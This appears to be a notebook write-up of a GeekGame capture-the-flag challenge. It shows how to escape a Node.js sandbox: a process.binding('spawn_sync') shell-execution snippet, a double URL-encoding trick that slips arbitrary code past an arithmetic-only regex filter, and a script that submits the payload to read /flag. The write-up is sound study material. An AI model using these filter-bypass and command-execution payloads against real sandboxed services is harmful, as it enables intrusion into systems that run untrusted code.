## node RCE

```js
process.binding('spawn_sync')
    .spawn({file:'/bin/sh',args:['sh', '-c', 'ls .'],
        stdio:[{type:'pipe',readable:true,writable:false},
            {type:'pipe',readable:true,writable:true},
            {type:'pipe',readable:true,writable:true}]
    })
```

About `process.binding`:

- [Documentation](https://nodejs.org/api/deprecations.html#DEP0111): `process.binding()` is for use by Node.js internal code only.
- [Source code](https://github.com/nodejs/node/blob/main/lib/internal/bootstrap/loaders.js)

High level abstraction about `process.binding('spawn_sync').spawn`: https://nodejs.org/api/child_process.html#child_processspawnsynccommand-args-options.

## JS with restricted charset

### Example: ultimatesandbox

Source: [Geekgame-2nd](https://github.com/PKU-GeekGame/geekgame-2nd/tree/master/official_writeup/ultimatesandbox)

Restriction: the input code need to satisfy the following regex. The regex is designed to vaildate arithmatic expression.

```
^([a-z0-9+\-*/%(), ]|([0-9]+[.])+[0-9]+)+$
```

In [1]:
def urlencode(s):
    return ''.join('%%%02x' % ord(i) for i in s)
def escape(code):
    return f'eval(unescape(/%2f%0a{ urlencode(code) }%2f/))'
print(escape(r'console.log(123)'))

eval(unescape(/%2f%0a%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%31%32%33%29%2f/))


In [2]:
%%script node
console.log(unescape(/a/))
console.log(unescape(/%2f%0a%63%6f%6e%73%6f%6c%65%2e%6c%6f%67%28%31%32%33%29%2f/))

/a/
//
console.log(123)//


In [3]:
# And what if we cannot use `%`?
# We can generate the '%' symbol with `escape(/a/)`
def escape(code):
    code = code + '; process.exit()';  # skip all symbols after the first '%' symbol
    # Encode twice to ensure that there are only numbers (but no 'a'-'f'). 
    # The insight here is that 'a'-'f' lie in 0x61-0x66.
    escaped_code = urlencode(urlencode(code)).replace('%', '+p+')[1:]
    return f'for(const p of escape(atob(/a/))) eval(unescape(unescape({ escaped_code })))'
submit_code = escape(r'console.log(123)')
print(submit_code)

for(const p of escape(atob(/a/))) eval(unescape(unescape(p+25+p+36+p+33+p+25+p+36+p+66+p+25+p+36+p+65+p+25+p+37+p+33+p+25+p+36+p+66+p+25+p+36+p+63+p+25+p+36+p+35+p+25+p+32+p+65+p+25+p+36+p+63+p+25+p+36+p+66+p+25+p+36+p+37+p+25+p+32+p+38+p+25+p+33+p+31+p+25+p+33+p+32+p+25+p+33+p+33+p+25+p+32+p+39+p+25+p+33+p+62+p+25+p+32+p+30+p+25+p+37+p+30+p+25+p+37+p+32+p+25+p+36+p+66+p+25+p+36+p+33+p+25+p+36+p+35+p+25+p+37+p+33+p+25+p+37+p+33+p+25+p+32+p+65+p+25+p+36+p+35+p+25+p+37+p+38+p+25+p+36+p+39+p+25+p+37+p+34+p+25+p+32+p+38+p+25+p+32+p+39)))


In [4]:
rce_code = """
console.log(JSON.stringify(
    process.binding('spawn_sync')
    .spawn({file:'/bin/sh',args:['sh', '-c', 'cat /flag'],
        stdio:[{type:'pipe',readable:true,writable:false},
            {type:'pipe',readable:true,writable:true},
            {type:'pipe',readable:true,writable:true}]
    })
))
""".strip()
submit_code = escape(rce_code)

In [5]:
import requests
def submit(mode, expr):
    return requests.post('https://prob09-vtjqfzau.geekgame.pku.edu.cn/submit',
                         json={'mode':mode, 'expr':expr}).json()
result = submit('node', submit_code)
print(result)
print(''.join(map(chr, result['result']['output'][1]['data'])))
print(''.join(map(chr, result['result']['output'][2]['data'])))

{'result': {'status': 0, 'signal': None, 'output': [None, {'type': 'Buffer', 'data': [102, 108, 97, 103, 123, 110, 111, 100, 101, 95, 115, 97, 110, 68, 98, 111, 120, 95, 49, 115, 95, 97, 108, 119, 97, 89, 83, 95, 82, 105, 115, 107, 121, 125, 10]}, {'type': 'Buffer', 'data': []}], 'pid': 1071}}
flag{node_sanDbox_1s_alwaYS_Risky}


